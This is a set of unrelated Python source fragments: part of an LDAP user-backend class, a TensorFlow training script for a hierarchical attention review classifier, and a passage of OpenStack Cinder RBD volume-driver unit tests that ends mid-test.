raise ReadOnlyError
if not self.user_exists(user):
raise UserNotFoundError
dn = self.get_full_user_dn(user)
mod_attrs = [
(ldap.MOD_REPLACE, 'userpassword', str(self.encrypt_password(password)))
]
try:
self.cnx.modify_s(str(dn), mod_attrs)
except ldap.NO_SUCH_OBJECT as ex:
raise UserNotFoundError(ex)
except Exception as ex:
raise UserBackendError(ex)
def user_exists(self, user):
"""
:inherit.
"""
base = self.get_full_dn(self.users_dn)
scope = ldap.SCOPE_SUBTREE
s_filter = 'cn=' + user
try:
result = self.cnx.search_s(str(base), scope, filterstr=str(s_filter))
return len(result) != 0
except ldap.NO_SUCH_OBJECT as ex:
return False
except Exception as ex:
raise UserBackendError(ex)
| |
#!/usr/bin/env python3
import argparse

# Parse CLI flags first so invalid arguments fail fast, before the
# heavyweight imports below (TensorFlow, spacy, ...) are pulled in.
parser = argparse.ArgumentParser()
parser.add_argument('--task', default='yelp', choices=['yelp'])
parser.add_argument('--mode', default='train', choices=['train', 'eval'])
parser.add_argument('--checkpoint-frequency', type=int, default=100)
parser.add_argument('--eval-frequency', type=int, default=10000)
parser.add_argument('--batch-size', type=int, default=30)
parser.add_argument("--device", default="/cpu:0")
parser.add_argument("--max-grad-norm", type=float, default=5.0)
parser.add_argument("--lr", type=float, default=0.001)
args = parser.parse_args()

import importlib
import os
import pickle
import random
import time
from collections import Counter, defaultdict

import numpy as np
import pandas as pd
import spacy
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
from tqdm import tqdm
import ujson

from data_util import batch

# The task module (e.g. yelp.py) provides the dataset readers and paths.
task_name = args.task
task = importlib.import_module(task_name)

# Checkpoint / TensorBoard locations. The original code assigned
# checkpoint_dir to '<train_dir>/checkpoint' and immediately overwrote it
# with '<train_dir>/checkpoints'; the dead first assignment was removed.
tflog_dir = os.path.join(task.train_dir, 'tflog')
checkpoint_name = task_name + '-model'
checkpoint_dir = os.path.join(task.train_dir, 'checkpoints')
checkpoint_path = os.path.join(checkpoint_dir, checkpoint_name)

# @TODO: move calculation into `task file`
# Inverse-frequency class weights, normalized by the mean count, so rare
# labels get proportionally larger weights during training.
trainset = task.read_trainset(epochs=1)
class_weights = pd.Series(Counter([l for _, l in trainset]))
class_weights = 1/(class_weights/class_weights.mean())
class_weights = class_weights.to_dict()

vocab = task.read_vocab()
labels = task.read_labels()
classes = max(labels.values())+1
vocab_size = task.vocab_size
# Reverse lookups (id -> label name, id -> token) used when decoding output.
labels_rev = {int(v): k for k, v in labels.items()}
vocab_rev = {int(v): k for k, v in vocab.items()}
def HAN_model_1(session, restore_only=False):
    """Hierarchical Attention Network.

    Builds the HAN classifier graph and either restores the latest
    checkpoint from `checkpoint_dir` or (unless `restore_only`) initializes
    fresh parameters in `session`.

    :param session: TensorFlow session to restore/initialize variables in.
    :param restore_only: When True, raise FileNotFoundError instead of
        creating a fresh model if no checkpoint exists.
    :returns: Tuple of (model, saver).
    """
    import tensorflow as tf
    try:
        from tensorflow.contrib.rnn import GRUCell, MultiRNNCell, DropoutWrapper
    except ImportError:
        # Older TF releases expose the RNN cells under tf.nn.rnn_cell.
        MultiRNNCell = tf.nn.rnn_cell.MultiRNNCell
        GRUCell = tf.nn.rnn_cell.GRUCell
    from bn_lstm import BNLSTMCell
    from HAN_model import HANClassifierModel

    # Fed at run time to toggle batch-norm / dropout behavior.
    is_training = tf.placeholder(dtype=tf.bool, name='is_training')

    cell = BNLSTMCell(80, is_training)  # h-h batchnorm LSTMCell
    # cell = GRUCell(30)
    # NOTE(review): the *same* cell object is stacked 5 times and also shared
    # between word_cell and sentence_cell below, which ties their weights —
    # confirm this sharing is intentional.
    cell = MultiRNNCell([cell]*5)

    model = HANClassifierModel(
        vocab_size=vocab_size,
        embedding_size=200,
        classes=classes,
        word_cell=cell,
        sentence_cell=cell,
        word_output_size=100,
        sentence_output_size=100,
        device=args.device,
        learning_rate=args.lr,
        max_grad_norm=args.max_grad_norm,
        dropout_keep_proba=0.5,
        is_training=is_training,
    )

    saver = tf.train.Saver(tf.global_variables())
    checkpoint = tf.train.get_checkpoint_state(checkpoint_dir)
    if checkpoint:
        # Resume from the most recent checkpoint when one exists.
        print("Reading model parameters from %s" % checkpoint.model_checkpoint_path)
        saver.restore(session, checkpoint.model_checkpoint_path)
    elif restore_only:
        raise FileNotFoundError("Cannot restore model")
    else:
        print("Created model with fresh parameters")
        session.run(tf.global_variables_initializer())
    # tf.get_default_graph().finalize()
    return model, saver
# Model factory used by train()/evaluate(); swap here to try another model.
model_fn = HAN_model_1


def decode(ex):
    """Pretty-print one (document, label) example via the reverse vocab.

    `ex[0]` is a list of sentences (each a list of word ids); `ex[1]` is the
    label id. Unknown word ids are rendered as '<?>'.
    """
    print('text: ' + '\n'.join([' '.join([vocab_rev.get(wid, '<?>') for wid in sent]) for sent in ex[0]]))
    print('label: ', labels_rev[ex[1]])


print('data loaded')
def batch_iterator(dataset, batch_size, max_epochs):
    """Yield (inputs, labels) batches of size `batch_size` from `dataset`.

    `dataset` is iterated `max_epochs` times; each element must be an
    (x, y) pair. A trailing partial batch is dropped at the end of every
    epoch, so only full batches are ever yielded.
    """
    for _ in range(max_epochs):
        inputs, targets = [], []
        for x, y in dataset:
            inputs.append(x)
            targets.append(y)
            if len(inputs) == batch_size:
                yield inputs, targets
                inputs, targets = [], []
def ev(session, model, dataset):
    """Run one inference pass of `model` over `dataset`.

    :param session: Active TensorFlow session.
    :param model: Model exposing `prediction` and `get_feed_data`.
    :param dataset: Iterable of (x, y) examples.
    :returns: pandas DataFrame with columns 'predictions', 'labels' and
        'examples', one row per evaluated example.
    """
    predictions = []
    labels = []
    examples = []
    # Single epoch; a trailing partial batch is dropped by batch_iterator.
    for x, y in tqdm(batch_iterator(dataset, args.batch_size, 1)):
        examples.extend(x)
        labels.extend(y)
        predictions.extend(session.run(model.prediction, model.get_feed_data(x, is_training=False)))
    df = pd.DataFrame({'predictions': predictions, 'labels': labels, 'examples': examples})
    return df
def evaluate(dataset):
    """Restore the latest checkpoint and print accuracy on `dataset`.

    Drops into an interactive IPython shell afterwards so the result
    DataFrame `df` can be inspected manually.
    """
    tf.reset_default_graph()
    config = tf.ConfigProto(allow_soft_placement=True)
    with tf.Session(config=config) as s:
        # restore_only=True: fail instead of initializing fresh parameters.
        model, _ = model_fn(s, restore_only=True)
        df = ev(s, model, dataset)
        # Fraction of examples whose prediction matches the label.
        print((df['predictions'] == df['labels']).mean())
        import IPython
        IPython.embed()
def train():
    """Train the model with periodic logging, checkpointing and evaluation.

    Streams batches from the task's training set through `model.train_op`,
    writes TensorBoard summaries every step, saves a checkpoint every
    `--checkpoint-frequency` steps and evaluates on the dev set every
    `--eval-frequency` steps.
    """
    tf.reset_default_graph()
    config = tf.ConfigProto(allow_soft_placement=True)
    with tf.Session(config=config) as s:
        model, saver = model_fn(s)
        summary_writer = tf.summary.FileWriter(tflog_dir, graph=tf.get_default_graph())
        # Optional TensorBoard embedding projector setup, kept for reference:
        # Format: tensorflow/contrib/tensorboard/plugins/projector/projector_config.proto
        # pconf = projector.ProjectorConfig()
        # embedding = pconf.embeddings.add()
        # embedding.tensor_name = m.embedding_matrix.name
        # embedding.metadata_path = vocab_tsv
        # projector.visualize_embeddings(summary_writer, pconf)
        for i, (x, y) in enumerate(batch_iterator(task.read_trainset(epochs=3), args.batch_size, 300)):
            fd = model.get_feed_data(x, y, class_weights=class_weights)
            # time.perf_counter() replaces time.clock(), which was deprecated
            # since Python 3.3 and removed in Python 3.8.
            t0 = time.perf_counter()
            step, summaries, loss, accuracy, _ = s.run([
                model.global_step,
                model.summary_op,
                model.loss,
                model.accuracy,
                model.train_op,
            ], fd)
            td = time.perf_counter() - t0
            summary_writer.add_summary(summaries, global_step=step)
            # Log every step (the original guard `step % 1 == 0` was always
            # true, so this is behaviorally identical).
            print('step %s, loss=%s, accuracy=%s, t=%s, inputs=%s' % (step, loss, accuracy, round(td, 2), fd[model.inputs].shape))
            if step != 0 and step % args.checkpoint_frequency == 0:
                print('checkpoint & graph meta')
                saver.save(s, checkpoint_path, global_step=step)
                print('checkpoint done')
            if step != 0 and step % args.eval_frequency == 0:
                # Report the global step; the original printed the enumerate
                # index `i`, which drifts from `step` after a restart.
                print('evaluation at step %s' % step)
                dev_df = ev(s, model, task.read_devset(epochs=1))
                print('dev accuracy: %.2f' % (dev_df['predictions'] == dev_df['labels']).mean())
def main():
    """Entry point: dispatch to training or evaluation based on --mode."""
    if args.mode == 'eval':
        evaluate(task.read_devset(epochs=1))
    elif args.mode == 'train':
        train()


if __name__ == '__main__':
    main()
| |
# Copyright 2012 Josh Durgin
# Copyright 2013 Canonical Ltd.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import math
import os
import tempfile
import mock
from cinder import db
from cinder import exception
from cinder.i18n import _
from cinder.image import image_utils
from cinder.openstack.common import log as logging
from cinder.openstack.common import timeutils
from cinder.openstack.common import units
from cinder import test
from cinder.tests.image import fake as fake_image
from cinder.tests.test_volume import DriverTestCase
from cinder.volume import configuration as conf
import cinder.volume.drivers.rbd as driver
from cinder.volume.flows.manager import create_volume
LOG = logging.getLogger(__name__)
# This is used to collect raised exceptions so that tests may check what was
# raised.
# NOTE: this must be initialised in test setUp().
RAISED_EXCEPTIONS = []
class MockException(Exception):
    """Base class for the fake rbd exceptions used in these tests.

    Every instantiation records the concrete exception type in the
    module-level RAISED_EXCEPTIONS list so tests can verify what was raised.
    """
    def __init__(self, *args, **kwargs):
        # Record the concrete subclass, not the message, for later assertions.
        RAISED_EXCEPTIONS.append(type(self))
class MockImageNotFoundException(MockException):
    """Test stand-in for rbd.ImageNotFound."""
class MockImageBusyException(MockException):
    """Test stand-in for rbd.ImageBusy."""
class MockImageExistsException(MockException):
    """Test stand-in for rbd.ImageExists."""
def common_mocks(f):
    """Decorator to set mocks common to all tests.

    The point of doing these mocks here is so that we don't accidentally set
    mocks that can't/don't get unset.
    """
    def _common_inner_inner1(inst, *args, **kwargs):
        # mock.patch decorators apply bottom-up, so the parameter order of
        # _common_inner_inner2 is the reverse of the decorator order.
        @mock.patch('cinder.volume.drivers.rbd.RBDVolumeProxy')
        @mock.patch('cinder.volume.drivers.rbd.RADOSClient')
        @mock.patch('cinder.backup.drivers.ceph.rbd')
        @mock.patch('cinder.backup.drivers.ceph.rados')
        def _common_inner_inner2(mock_rados, mock_rbd, mock_client,
                                 mock_proxy):
            # Expose the patched objects on the test instance so individual
            # tests can configure and assert against them.
            inst.mock_rbd = mock_rbd
            inst.mock_rados = mock_rados
            inst.mock_client = mock_client
            inst.mock_proxy = mock_proxy
            inst.mock_rados.Rados = mock.Mock
            inst.mock_rados.Rados.ioctx = mock.Mock()
            inst.mock_rbd.RBD = mock.Mock
            inst.mock_rbd.Image = mock.Mock
            inst.mock_rbd.Image.close = mock.Mock()
            inst.mock_rbd.RBD.Error = Exception
            inst.mock_rados.Error = Exception
            # Exception classes that record themselves in RAISED_EXCEPTIONS
            # when instantiated (see MockException above).
            inst.mock_rbd.ImageBusy = MockImageBusyException
            inst.mock_rbd.ImageNotFound = MockImageNotFoundException
            inst.mock_rbd.ImageExists = MockImageExistsException

            inst.driver.rbd = inst.mock_rbd
            inst.driver.rados = inst.mock_rados
            return f(inst, *args, **kwargs)

        # Call immediately: the patches are active only inside this call, so
        # the wrapped test runs (and finishes) with all mocks in place.
        return _common_inner_inner2()
    return _common_inner_inner1
CEPH_MON_DUMP = """dumped monmap epoch 1
{ "epoch": 1,
"fsid": "33630410-6d93-4d66-8e42-3b953cf194aa",
"modified": "2013-05-22 17:44:56.343618",
"created": "2013-05-22 17:44:56.343618",
"mons": [
{ "rank": 0,
"name": "a",
"addr": "[::1]:6789\/0"},
{ "rank": 1,
"name": "b",
"addr": "[::1]:6790\/0"},
{ "rank": 2,
"name": "c",
"addr": "[::1]:6791\/0"},
{ "rank": 3,
"name": "d",
"addr": "127.0.0.1:6792\/0"},
{ "rank": 4,
"name": "e",
"addr": "example.com:6791\/0"}],
"quorum": [
0,
1,
2]}
"""
class RBDTestCase(test.TestCase):
def setUp(self):
global RAISED_EXCEPTIONS
RAISED_EXCEPTIONS = []
super(RBDTestCase, self).setUp()
self.cfg = mock.Mock(spec=conf.Configuration)
self.cfg.volume_tmp_dir = None
self.cfg.rbd_pool = 'rbd'
self.cfg.rbd_ceph_conf = None
self.cfg.rbd_secret_uuid = None
self.cfg.rbd_user = None
self.cfg.volume_dd_blocksize = '1M'
self.cfg.rbd_store_chunk_size = 4
mock_exec = mock.Mock()
mock_exec.return_value = ('', '')
self.driver = driver.RBDDriver(execute=mock_exec,
configuration=self.cfg)
self.driver.set_initialized()
self.volume_name = u'volume-00000001'
self.snapshot_name = u'snapshot-00000001'
self.volume_size = 1
self.volume = dict(name=self.volume_name, size=self.volume_size)
self.snapshot = dict(volume_name=self.volume_name,
name=self.snapshot_name)
@common_mocks
def test_create_volume(self):
client = self.mock_client.return_value
client.__enter__.return_value = client
with mock.patch.object(self.driver, '_supports_layering') as \
mock_supports_layering:
mock_supports_layering.return_value = True
self.mock_rbd.RBD.create = mock.Mock()
self.driver.create_volume(self.volume)
chunk_size = self.cfg.rbd_store_chunk_size * units.Mi
order = int(math.log(chunk_size, 2))
args = [client.ioctx, str(self.volume_name),
self.volume_size * units.Gi, order]
kwargs = {'old_format': False,
'features': self.mock_rbd.RBD_FEATURE_LAYERING}
self.mock_rbd.RBD.create.assert_called_once_with(*args, **kwargs)
client.__enter__.assert_called_once()
client.__exit__.assert_called_once()
mock_supports_layering.assert_called_once()
@common_mocks
def test_manage_existing_get_size(self):
with mock.patch.object(self.driver.rbd.Image, 'size') as \
mock_rbd_image_size:
with mock.patch.object(self.driver.rbd.Image, 'close') \
as mock_rbd_image_close:
mock_rbd_image_size.return_value = 2 * units.Gi
existing_ref = {'source-name': self.volume_name}
return_size = self.driver.manage_existing_get_size(
self.volume,
existing_ref)
self.assertEqual(2, return_size)
mock_rbd_image_size.assert_called_once_with()
mock_rbd_image_close.assert_called_once_with()
@common_mocks
def test_manage_existing_get_invalid_size(self):
with mock.patch.object(self.driver.rbd.Image, 'size') as \
mock_rbd_image_size:
with mock.patch.object(self.driver.rbd.Image, 'close') \
as mock_rbd_image_close:
mock_rbd_image_size.return_value = 'abcd'
existing_ref = {'source-name': self.volume_name}
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.manage_existing_get_size,
self.volume, existing_ref)
mock_rbd_image_size.assert_called_once_with()
mock_rbd_image_close.assert_called_once_with()
@common_mocks
def test_manage_existing(self):
client = self.mock_client.return_value
client.__enter__.return_value = client
with mock.patch.object(driver, 'RADOSClient') as mock_rados_client:
with mock.patch.object(self.driver.rbd.RBD(), 'rename') as \
mock_rbd_image_rename:
exist_volume = 'vol-exist'
existing_ref = {'source-name': exist_volume}
mock_rbd_image_rename.return_value = 0
mock_rbd_image_rename(mock_rados_client.ioctx,
exist_volume,
self.volume_name)
self.driver.manage_existing(self.volume, existing_ref)
mock_rbd_image_rename.assert_called_with(
mock_rados_client.ioctx,
exist_volume,
self.volume_name)
@common_mocks
def test_manage_existing_with_exist_rbd_image(self):
client = self.mock_client.return_value
client.__enter__.return_value = client
self.mock_rbd.Image.rename = mock.Mock()
self.mock_rbd.Image.rename.side_effect = \
MockImageExistsException
exist_volume = 'vol-exist'
existing_ref = {'source-name': exist_volume}
self.assertRaises(self.mock_rbd.ImageExists,
self.driver.manage_existing,
self.volume, existing_ref)
#make sure the exception was raised
self.assertEqual(RAISED_EXCEPTIONS,
[self.mock_rbd.ImageExists])
@common_mocks
def test_create_volume_no_layering(self):
client = self.mock_client.return_value
client.__enter__.return_value = client
with mock.patch.object(self.driver, '_supports_layering') as \
mock_supports_layering:
mock_supports_layering.return_value = False
self.mock_rbd.RBD.create = mock.Mock()
self.driver.create_volume(self.volume)
chunk_size = self.cfg.rbd_store_chunk_size * units.Mi
order = int(math.log(chunk_size, 2))
args = [client.ioctx, str(self.volume_name),
self.volume_size * units.Gi, order]
kwargs = {'old_format': True,
'features': 0}
self.mock_rbd.RBD.create.assert_called_once_with(*args, **kwargs)
client.__enter__.assert_called_once()
client.__exit__.assert_called_once()
mock_supports_layering.assert_called_once()
@common_mocks
def test_delete_backup_snaps(self):
self.driver.rbd.Image.remove_snap = mock.Mock()
with mock.patch.object(self.driver, '_get_backup_snaps') as \
mock_get_backup_snaps:
mock_get_backup_snaps.return_value = [{'name': 'snap1'}]
rbd_image = self.driver.rbd.Image()
self.driver._delete_backup_snaps(rbd_image)
mock_get_backup_snaps.assert_called_once_with(rbd_image)
self.assertTrue(self.driver.rbd.Image.remove_snap.called)
@common_mocks
def test_delete_volume(self):
client = self.mock_client.return_value
self.driver.rbd.Image.list_snaps = mock.Mock()
self.driver.rbd.Image.list_snaps.return_value = []
self.driver.rbd.Image.close = mock.Mock()
self.driver.rbd.Image.remove = mock.Mock()
self.driver.rbd.Image.unprotect_snap = mock.Mock()
with mock.patch.object(self.driver, '_get_clone_info') as \
mock_get_clone_info:
with mock.patch.object(self.driver, '_delete_backup_snaps') as \
mock_delete_backup_snaps:
mock_get_clone_info.return_value = (None, None, None)
self.driver.delete_volume(self.volume)
mock_get_clone_info.assert_called_once()
self.driver.rbd.Image.list_snaps.assert_called_once()
client.__enter__.assert_called_once()
client.__exit__.assert_called_once()
mock_delete_backup_snaps.assert_called_once()
self.assertFalse(self.driver.rbd.Image.unprotect_snap.called)
self.driver.rbd.RBD.remove.assert_called_once()
@common_mocks
def delete_volume_not_found(self):
self.mock_rbd.Image.side_effect = self.mock_rbd.ImageNotFound
self.assertIsNone(self.driver.delete_volume(self.volume))
self.mock_rbd.Image.assert_called_once()
# Make sure the exception was raised
self.assertEqual(RAISED_EXCEPTIONS, [self.mock_rbd.ImageNotFound])
@common_mocks
def test_delete_busy_volume(self):
self.mock_rbd.Image.list_snaps = mock.Mock()
self.mock_rbd.Image.list_snaps.return_value = []
self.mock_rbd.Image.unprotect_snap = mock.Mock()
self.mock_rbd.RBD.remove = mock.Mock()
self.mock_rbd.RBD.remove.side_effect = self.mock_rbd.ImageBusy
with mock.patch.object(self.driver, '_get_clone_info') as \
mock_get_clone_info:
mock_get_clone_info.return_value = (None, None, None)
with mock.patch.object(self.driver, '_delete_backup_snaps') as \
mock_delete_backup_snaps:
with mock.patch.object(driver, 'RADOSClient') as \
mock_rados_client:
self.assertRaises(exception.VolumeIsBusy,
self.driver.delete_volume, self.volume)
mock_get_clone_info.assert_called_once()
self.mock_rbd.Image.list_snaps.assert_called_once()
mock_rados_client.assert_called_once()
mock_delete_backup_snaps.assert_called_once()
self.assertFalse(self.mock_rbd.Image.unprotect_snap.called)
self.mock_rbd.RBD.remove.assert_called_once()
# Make sure the exception was raised
self.assertEqual(RAISED_EXCEPTIONS,
[self.mock_rbd.ImageBusy])
@common_mocks
def test_create_snapshot(self):
proxy = self.mock_proxy.return_value
proxy.__enter__.return_value = proxy
self.driver.create_snapshot(self.snapshot)
args = [str(self.snapshot_name)]
proxy.create_snap.assert_called_with(*args)
proxy.protect_snap.assert_called_with(*args)
@common_mocks
def test_delete_snapshot(self):
proxy = self.mock_proxy.return_value
proxy.__enter__.return_value = proxy
self.driver.delete_snapshot(self.snapshot)
args = [str(self.snapshot_name)]
proxy.remove_snap.assert_called_with(*args)
proxy.unprotect_snap.assert_called_with(*args)
@common_mocks
def test_get_clone_info(self):
volume = self.mock_rbd.Image()
volume.set_snap = mock.Mock()
volume.parent_info = mock.Mock()
parent_info = ('a', 'b', '%s.clone_snap' % (self.volume_name))
volume.parent_info.return_value = parent_info
info = self.driver._get_clone_info(volume, self.volume_name)
self.assertEqual(info, parent_info)
self.assertFalse(volume.set_snap.called)
volume.parent_info.assert_called_once()
@common_mocks
def test_get_clone_info_w_snap(self):
volume = self.mock_rbd.Image()
volume.set_snap = mock.Mock()
volume.parent_info = mock.Mock()
parent_info = ('a', 'b', '%s.clone_snap' % (self.volume_name))
volume.parent_info.return_value = parent_info
snapshot = self.mock_rbd.ImageSnapshot()
info = self.driver._get_clone_info(volume, self.volume_name,
snap=snapshot)
self.assertEqual(info, parent_info)
volume.set_snap.assert_called_once()
self.assertEqual(volume.set_snap.call_count, 2)
volume.parent_info.assert_called_once()
@common_mocks
def test_get_clone_info_w_exception(self):
volume = self.mock_rbd.Image()
volume.set_snap = mock.Mock()
volume.parent_info = mock.Mock()
volume.parent_info.side_effect = self.mock_rbd.ImageNotFound
snapshot = self.mock_rbd.ImageSnapshot()
info = self.driver._get_clone_info(volume, self.volume_name,
snap=snapshot)
self.assertEqual(info, (None, None, None))
volume.set_snap.assert_called_once()
self.assertEqual(volume.set_snap.call_count, 2)
volume.parent_info.assert_called_once()
# Make sure the exception was raised
self.assertEqual(RAISED_EXCEPTIONS, [self.mock_rbd.ImageNotFound])
@common_mocks
def test_get_clone_info_deleted_volume(self):
volume = self.mock_rbd.Image()
volume.set_snap = mock.Mock()
volume.parent_info = mock.Mock()
parent_info = ('a', 'b', '%s.clone_snap' % (self.volume_name))
volume.parent_info.return_value = parent_info
info = self.driver._get_clone_info(volume,
"%s.deleted" % (self.volume_name))
self.assertEqual(info, parent_info)
self.assertFalse(volume.set_snap.called)
volume.parent_info.assert_called_once()
@common_mocks
def test_create_cloned_volume(self):
src_name = u'volume-00000001'
dst_name = u'volume-00000002'
self.cfg.rbd_max_clone_depth = 2
self.mock_rbd.RBD.clone = mock.Mock()
with mock.patch.object(self.driver, '_get_clone_depth') as \
mock_get_clone_depth:
# Try with no flatten required
mock_get_clone_depth.return_value = 1
self.mock_rbd.Image.create_snap = mock.Mock()
self.mock_rbd.Image.protect_snap = mock.Mock()
self.mock_rbd.Image.close = mock.Mock()
self.driver.create_cloned_volume(dict(name=dst_name),
dict(name=src_name))
self.mock_rbd.Image.create_snap.assert_called_once()
self.mock_rbd.Image.protect_snap.assert_called_once()
self.mock_rbd.RBD.clone.assert_called_once()
self.mock_rbd.Image.close.assert_called_once()
self.assertTrue(mock_get_clone_depth.called)
@common_mocks
def test_create_cloned_volume_w_flatten(self):
src_name = u'volume-00000001'
dst_name = u'volume-00000002'
self.cfg.rbd_max_clone_depth = 1
self.mock_rbd.RBD.clone = mock.Mock()
self.mock_rbd.RBD.clone.side_effect = self.mock_rbd.RBD.Error
with mock.patch.object(self.driver, '_get_clone_depth') as \
mock_get_clone_depth:
# Try with no flatten required
mock_get_clone_depth.return_value = 1
self.mock_rbd.Image.create_snap = mock.Mock()
self.mock_rbd.Image.protect_snap = mock.Mock()
self.mock_rbd.Image.unprotect_snap = mock.Mock()
self.mock_rbd.Image.remove_snap = mock.Mock()
self.mock_rbd.Image.close = mock.Mock()
self.assertRaises(self.mock_rbd.RBD.Error,
self.driver.create_cloned_volume,
dict(name=dst_name), dict(name=src_name))
self.mock_rbd.Image.create_snap.assert_called_once()
self.mock_rbd.Image.protect_snap.assert_called_once()
self.mock_rbd.RBD.clone.assert_called_once()
self.mock_rbd.Image.unprotect_snap.assert_called_once()
self.mock_rbd.Image.remove_snap.assert_called_once()
self.mock_rbd.Image.close.assert_called_once()
self.assertTrue(mock_get_clone_depth.called)
@common_mocks
def test_create_cloned_volume_w_clone_exception(self):
src_name = u'volume-00000001'
dst_name = u'volume-00000002'
self.cfg.rbd_max_clone_depth = 2
self.mock_rbd.RBD.clone = mock.Mock()
self.mock_rbd.RBD.clone.side_effect = self.mock_rbd.RBD.Error
with mock.patch.object(self.driver, '_get_clone_depth') as \
mock_get_clone_depth:
# Try with no flatten required
mock_get_clone_depth.return_value = 1
self.mock_rbd.Image.create_snap = mock.Mock()
self.mock_rbd.Image.protect_snap = mock.Mock()
self.mock_rbd.Image.unprotect_snap = mock.Mock()
self.mock_rbd.Image.remove_snap = mock.Mock()
self.mock_rbd.Image.close = mock.Mock()
self.assertRaises(self.mock_rbd.RBD.Error,
self.driver.create_cloned_volume,
dict(name=dst_name), dict(name=src_name))
self.mock_rbd.Image.create_snap.assert_called_once()
self.mock_rbd.Image.protect_snap.assert_called_once()
self.mock_rbd.RBD.clone.assert_called_once()
self.mock_rbd.Image.unprotect_snap.assert_called_once()
self.mock_rbd.Image.remove_snap.assert_called_once()
self.mock_rbd.Image.close.assert_called_once()
@common_mocks
def test_good_locations(self):
locations = ['rbd://fsid/pool/image/snap',
'rbd://%2F/%2F/%2F/%2F', ]
map(self.driver._parse_location, locations)
@common_mocks
def test_bad_locations(self):
locations = ['rbd://image',
'http://path/to/somewhere/else',
'rbd://image/extra',
'rbd://image/',
'rbd://fsid/pool/image/',
'rbd://fsid/pool/image/snap/',
'rbd://///', ]
for loc in locations:
self.assertRaises(exception.ImageUnacceptable,
self.driver._parse_location,
loc)
self.assertFalse(
self.driver._is_cloneable(loc, {'disk_format': 'raw'}))
@common_mocks
def test_cloneable(self):
with mock.patch.object(self.driver, '_get_fsid') as mock_get_fsid:
mock_get_fsid.return_value = 'abc'
location = 'rbd://abc/pool/image/snap'
info = {'disk_format': 'raw'}
self.assertTrue(self.driver._is_cloneable(location, info))
self.assertTrue(mock_get_fsid.called)
@common_mocks
def test_uncloneable_different_fsid(self):
with mock.patch.object(self.driver, '_get_fsid') as mock_get_fsid:
mock_get_fsid.return_value = 'abc'
location = 'rbd://def/pool/image/snap'
self.assertFalse(
self.driver._is_cloneable(location, {'disk_format': 'raw'}))
self.assertTrue(mock_get_fsid.called)
@common_mocks
def test_uncloneable_unreadable(self):
with mock.patch.object(self.driver, '_get_fsid') as mock_get_fsid:
mock_get_fsid.return_value = 'abc'
location = 'rbd://abc/pool/image/snap'
self.mock_proxy.side_effect = self.mock_rbd.Error
args = [location, {'disk_format': 'raw'}]
self.assertFalse(self.driver._is_cloneable(*args))
self.mock_proxy.assert_called_once()
self.assertTrue(mock_get_fsid.called)
@common_mocks
def test_uncloneable_bad_format(self):
with mock.patch.object(self.driver, '_get_fsid') as mock_get_fsid:
mock_get_fsid.return_value = 'abc'
location = 'rbd://abc/pool/image/snap'
formats = ['qcow2', 'vmdk', 'vdi']
for f in formats:
self.assertFalse(
self.driver._is_cloneable(location, {'disk_format': f}))
self.assertTrue(mock_get_fsid.called)
def _copy_image(self):
with mock.patch.object(tempfile, 'NamedTemporaryFile'):
with mock.patch.object(os.path, 'exists') as mock_exists:
mock_exists.return_value = True
with mock.patch.object(image_utils, 'fetch_to_raw'):
with mock.patch.object(self.driver, 'delete_volume'):
with mock.patch.object(self.driver, '_resize'):
mock_image_service = mock.MagicMock()
args = [None, {'name': 'test', 'size': 1},
mock_image_service, None]
self.driver.copy_image_to_volume(*args)
    @common_mocks
    def test_copy_image_no_volume_tmp(self):
        # No scratch directory configured: the image download is staged
        # through a NamedTemporaryFile (mocked in _copy_image).
        self.cfg.volume_tmp_dir = None
        self._copy_image()
    @common_mocks
    def test_copy_image_volume_tmp(self):
        # Explicit scratch directory configured for the temporary image file.
        self.cfg.volume_tmp_dir = '/var/run/cinder/tmp'
        self._copy_image()
    @common_mocks
    def test_update_volume_stats(self):
        """Cluster stats reported in kB are converted to GiB capacity."""
        client = self.mock_client.return_value
        client.__enter__.return_value = client
        client.cluster = mock.Mock()
        client.cluster.get_cluster_stats = mock.Mock()
        # 1024**3 kB total == 1024 GiB; 1024**2 kB available == 1 GiB
        client.cluster.get_cluster_stats.return_value = {'kb': 1024 ** 3,
                                                         'kb_avail': 1024 ** 2}
        self.driver.configuration.safe_get = mock.Mock()
        self.driver.configuration.safe_get.return_value = 'RBD'
        expected = dict(
            volume_backend_name='RBD',
            vendor_name='Open Source',
            driver_version=self.driver.VERSION,
            storage_protocol='ceph',
            total_capacity_gb=1024,
            free_capacity_gb=1,
            reserved_percentage=0)
        # refresh=True forces the driver to query the cluster
        actual = self.driver.get_volume_stats(True)
        client.cluster.get_cluster_stats.assert_called_once()
        self.assertDictMatch(expected, actual)
    @common_mocks
    def test_update_volume_stats_error(self):
        """If the cluster query fails, capacities fall back to 'unknown'."""
        client = self.mock_client.return_value
        client.__enter__.return_value = client
        client.cluster = mock.Mock()
        client.cluster.get_cluster_stats = mock.Mock()
        client.cluster.get_cluster_stats.side_effect = Exception
        self.driver.configuration.safe_get = mock.Mock()
        self.driver.configuration.safe_get.return_value = 'RBD'
        expected = dict(volume_backend_name='RBD',
                        vendor_name='Open Source',
                        driver_version=self.driver.VERSION,
                        storage_protocol='ceph',
                        total_capacity_gb='unknown',
                        free_capacity_gb='unknown',
                        reserved_percentage=0)
        actual = self.driver.get_volume_stats(True)
        client.cluster.get_cluster_stats.assert_called_once()
        self.assertDictMatch(expected, actual)
@common_mocks
def test_get_mon_addrs(self):
with mock.patch.object(self.driver, '_execute') as mock_execute:
mock_execute.return_value = (CEPH_MON_DUMP, '')
hosts = ['::1', '::1', '::1', '127.0.0.1', 'example.com']
ports = ['6789', '6790', '6791', '6792', '6791']
self.assertEqual((hosts, ports), self.driver._get_mon_addrs())
    @common_mocks
    def test_initialize_connection(self):
        """Connection info carries pool/volume name, monitors and auth data."""
        hosts = ['::1', '::1', '::1', '127.0.0.1', 'example.com']
        ports = ['6789', '6790', '6791', '6792', '6791']
        with mock.patch.object(self.driver, '_get_mon_addrs') as \
                mock_get_mon_addrs:
            mock_get_mon_addrs.return_value = (hosts, ports)
            expected = {
                'driver_volume_type': 'rbd',
                'data': {
                    # '<pool>/<volume>' is the RBD image spec
                    'name': '%s/%s' % (self.cfg.rbd_pool,
                                       self.volume_name),
